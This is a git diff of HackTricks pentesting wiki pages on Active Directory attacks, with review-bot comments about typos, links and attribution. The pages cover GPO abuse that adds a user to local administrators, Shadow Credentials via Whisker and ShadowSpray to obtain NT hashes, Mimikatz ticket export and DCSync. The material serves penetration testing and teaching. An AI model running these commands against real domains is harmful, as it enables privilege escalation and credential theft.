![](../../.gitbook/assets/a15.png)
|
![](../../../.gitbook/assets/a15.png)
|
||||||
|
|
||||||
If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
|
If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
|
||||||
|
|
||||||
|
@ -343,7 +346,7 @@ If we want to search for misconfigured GPOs specifically, we can chain multiple
|
||||||
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a16.png)
|
![](../../../.gitbook/assets/a16.png)
|
||||||
|
|
||||||
**Computers with a Given Policy Applied**
|
**Computers with a Given Policy Applied**
|
||||||
|
|
||||||
|
@ -353,7 +356,7 @@ We can now resolve the computer names the GPO `Misconfigured Policy` is applied
|
||||||
Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}
|
Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a17.png)
|
![](../../../.gitbook/assets/a17.png)
|
||||||
|
|
||||||
**Policies Applied to a Given Computer**
|
**Policies Applied to a Given Computer**
|
||||||
|
|
||||||
|
@ -379,11 +382,11 @@ One of the ways to abuse this misconfiguration and get code execution is to crea
|
||||||
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
|
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a19.png)
|
![](../../../.gitbook/assets/a19.png)
|
||||||
|
|
||||||
The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`:
|
The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a20.png)
|
![](../../../.gitbook/assets/a20.png)
|
||||||
|
|
||||||
### GroupPolicy module **- Abuse GPO**
|
### GroupPolicy module **- Abuse GPO**
|
||||||
|
|
||||||
|
@ -420,7 +423,7 @@ if you have access to the computer you can force it with `gpupdate /force` .
|
||||||
|
|
||||||
If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
|
If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a22.png)
|
![](../../../.gitbook/assets/a22.png)
|
||||||
|
|
||||||
Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
|
Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
|
||||||
|
|
||||||
|
@ -508,6 +511,7 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist

## References

* Initially, this information was mostly copied from [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) 
* [https://wald0.com/?p=112](https://wald0.com/?p=112)
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
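Review bot: good to see the ired.team attribution added as the first reference, since the new bullet itself says the GPO walkthrough above (the `Misconfigured Policy` / `evilTask` example) was mostly copied from there; the added line ends with a trailing space after the link, drop it so it matches the other entries, and consider stating the attribution at the top of the page rather than only in the reference list so readers see it before the copied material.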
@ -0,0 +1,111 @@
# Shadow Credentials

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

## Intro <a href="#3f17" id="3f17"></a>

Check the original post for [**all the information about this technique**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab).

As **summary**: if you can write to the **msDS-KeyCredentialLink** property of a user/computer, you can retrieve the **NT hash of that object**.

This is because you will be able to set **public-private key authentication credentials** for the object and use them to obtain a **special Service Ticket that contains its NTLM hash** inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM\_SUPPLEMENTAL\_CREDENTIAL entity that you can decrypt.

### Requirements <a href="#2de4" id="2de4"></a>

This technique requires the following:

* At least one Windows Server 2016 Domain Controller.
* A digital certificate for Server Authentication installed on the Domain Controller.
* Windows Server 2016 Functional Level in Active Directory.
* Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

## Abuse

Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:

1. Forge an **RC4 silver ticket** to impersonate privileged users to the corresponding host.
2. Use the TGT to call **S4U2Self** to impersonate **privileged users** to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.

Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is **restricted to the private key generated by the attacker**. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved.

Whisker

Alongside this post I am releasing a tool called “ [Whisker](https://github.com/eladshamir/Whisker) “. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol.

[Whisker](https://github.com/eladshamir/Whisker) has four functions:

* Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
* List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
* Remove — This function removes a key credential from the target object specified by a DeviceID GUID.
* Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.

## [Whisker](https://github.com/eladshamir/Whisker) <a href="#7e2e" id="7e2e"></a>

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their `msDS-KeyCredentialLink` attribute, effectively adding "Shadow Credentials" to the target account.

[**Whisker**](https://github.com/eladshamir/Whisker) has four functions:

* **Add** — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
* **List** — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
* **Remove** — This function removes a key credential from the target object specified by a DeviceID GUID.
* **Clear** — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.

### Add

Add a new value to the **`msDS-KeyCredentialLink`** attribute of a target object:

* `/target:<samAccountName>`: Required. Set the target name. Computer objects should end with a '$' sign.
* `/domain:<FQDN>`: Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to resolve the FQDN of the current user.
* `/dc:<IP/HOSTNAME>`: Optional. Set the target Domain Controller (DC). If not provided, will try to target the Primary Domain Controller (PDC).
* `/path:<PATH>`: Optional. Set the path to store the generated self-signed certificate for authentication. If not provided, the certificate will be printed as a Base64 blob.
* `/password:<PASWORD>`: Optional. Set the password for the stored self-signed certificate. If not provided, a random password will be generated.

Example: **`Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1`**

{% hint style="info" %}
More options on the [**Readme**](https://github.com/eladshamir/Whisker).
{% endhint %}

## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)

In several cases, the group "Everyone" / "Authenticated Users" / "Domain Users" or some other **wide group** contains almost all the users in the domain has some `GenericWrite`/`GenericAll` DACLs **over other objects** in the domain. [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) tries to **abuse** therefore **ShadowCredentials** over all of them

It goes something like this:

1. **Login** to the domain with the supplied credentials (Or use the current session).
2. Check that the **domain functional level is 2016** (Otherwise stop since the Shadow Credentials attack won't work)
3. Gather a **list of all the objects** in the domain (users and computers) from LDAP.
4. **For every object** in the list do the following:
   1. Try to **add KeyCredential** to the object's `msDS-KeyCredentialLink` attribute.
   2. If the above is **successful**, use **PKINIT** to request a **TGT** using the added KeyCredential.
   3. If the above is **successful**, perform an **UnPACTheHash** attack to reveal the user/computer **NT hash**.
   4. If **`--RestoreShadowCred`** was specified: Remove the added KeyCredential (clean up after yourself...)
5. If **`--Recursive`** was specified: Do the **same process** using each of the user/computer **accounts we successfully owned**.

## References

* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker)
* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/)

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
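Review bot: the block that starts with the bare line `Whisker` and `Alongside this post I am releasing a tool called “ Whisker “` is Elad Shamir's own first-person text from the SpecterOps post, and its four-function list (Add, List, Remove, Clear) is then repeated almost verbatim a few lines later under `## Whisker`; keep the `## Whisker` section and delete the earlier copy, or rewrite it in the page's own voice with the attribution. In the `### Add` example, `/domain:constoso.local` does not match `/dc:dc1.contoso.local` (typo for `contoso.local`), and the option list has `/password:<PASWORD>` for `<PASSWORD>`. The page also stops at adding the key credential: the Intro promises the object's NT hash and the ShadowSpray list spells out the remaining steps (PKINIT TGT with the added KeyCredential, then UnPACTheHash), so the Whisker section should show that follow-up after the `add` example, plus a `remove`/`clear` cleanup step so the added DeviceID is not left on the target, with the page's own warning that `clear` breaks a legitimate WHfB enrolment repeated next to it.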
@ -4,15 +4,11 @@

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

@ -29,7 +25,6 @@ You can **find Computer objects with this attribute** checking if the [userAccou
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

<strong># Export tickets with Mimikatz
</strong>privilege::debug
sekurlsa::tickets /export #Recommended way
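Review bot: the `<strong>## ADSearch` / `</strong>ADSearch.exe` and `<strong># Export tickets with Mimikatz` / `</strong>privilege::debug` lines in this hunk show GitBook bold markup leaking into a fenced code block, so the rendered block will contain literal `<strong>` tags or split its lines oddly; since the commit is already touching this block (it drops one line from it), strip those tags and keep the comment markers (`## ADSearch`, `# Export tickets with Mimikatz`) as plain text inside the fence.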
@ -53,7 +48,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```

If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)

**Here are other ways to try to force an authentication:**
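Review bot: the anchor rewrite from `acl-persistence-abuse.md#dcsync` to `acl-persistence-abuse/#dcsync` is correct for the new directory layout (the target page is now `acl-persistence-abuse/README.md`), but the line being rewritten still reads `If the TGT if from a domain controller` and `a[ **DCSync attack**]` (space on the wrong side of the bracket); fix both to `If the TGT is from a domain controller, you could perform a [**DCSync attack**]` while the line is being changed, and the `<unconstrinedmachine>` placeholder in the SpoolSample invocation just above is missing an `a` (`<unconstrainedmachine>`).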
@ -71,14 +66,10 @@ If the TGT if from a domain controller, you could perform a[ **DCSync attack**](

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
@ -155,7 +155,7 @@ Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (n
### Group Policy Object - GPOs

If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).

```powershell
#GPO
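Review bot: the link change to `../active-directory-methodology/acl-persistence-abuse/#gpo-delegation` is consistent with the other relative-link updates in this commit; the context line it continues, `he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task**`, should read `by **adding permissions to a user**, **adding a local admin user** to a host or **creating a scheduled task**` and is worth fixing in the same pass since the paragraph is already being edited.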
@ -193,8 +193,8 @@ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectNam

Learn how to **exploit permissions over GPOs and ACLs** in:

{% content-ref url="../active-directory-methodology/acl-persistence-abuse.md" %}
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse.md](../active-directory-methodology/acl-persistence-abuse.md)
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
{% endcontent-ref %}

### ACL